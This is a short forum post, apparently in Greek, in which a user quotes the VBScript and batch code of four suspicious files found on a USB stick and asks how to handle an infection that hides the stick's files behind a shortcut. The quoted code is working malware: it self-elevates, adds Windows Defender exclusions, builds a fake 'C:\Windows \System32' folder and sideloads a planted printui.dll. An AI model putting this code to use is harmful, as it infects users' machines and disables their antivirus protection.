malware

[xdv]

If Not WScript.Arguments.Named.Exists("elevated") Then
	Set sh = CreateObject("Shell.Application")
	sh.ShellExecute "wscript.exe", Chr(34) & WScript.ScriptFullName & Chr(34) & " /elevated", "", "runas", 1
	WScript.Quit
End If
Set fs = CreateObject("Scripting.FileSystemObject")
pp = fs.GetParentFolderName(WScript.ScriptFullName)
bp = pp & "\u197288.bat"
If fs.FileExists(bp) Then
	Set sp = WScript.CreateObject("WScript.Shell")
	sp.Run Chr(34) & bp & Chr(34), 0
End If

@echo off
chcp 65001
explorer "%~dp0..\KINGSTON"
if exist "%~dp0u509436.dat" if not exist "C:\Windows \System32\printui.dll" (
	powershell -Command "Add-MpPreference -ExclusionPath '%~dp0'; Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Start-Sleep -Seconds 2"
	if exist "C:\Windows \System32" rmdir /S /Q "\\?\C:\Windows "
	mkdir "\\?\C:\Windows \System32"
	xcopy "C:\Windows\System32\printui.exe" "C:\Windows \System32" /Y
	xcopy "%~dp0u509436.dat" "C:\Windows \System32" /Y
	ren "C:\Windows \System32\u509436.dat" "printui.dll"
	if exist "C:\Windows \System32\printui.exe" (
		if exist "C:\Windows \System32\printui.dll" (
			start "" "C:\Windows \System32\printui.exe"
		) else rmdir /S /Q "\\?\C:\Windows "
	) else rmdir /S /Q "\\?\C:\Windows "
)

σε ένα φλασάκι βρήκα τέσσερα ύποπτα αρχεία 

• ένα .vbs
• .bat
• .dat
• .bin

Ήταν όλα σε ένα φάκελο με όνομα sysvolume. Πιο πάνω παραθέτω τον κώδικα για δύο από αυτά. Το αποτέλεσμα είναι ότι εξαφανίζονται όλα τα αρχεία που υπάρχουν στο φλασάκι και εμφανίζεται μια συντόμευση!
Πώς το διαχειριζόμαστε;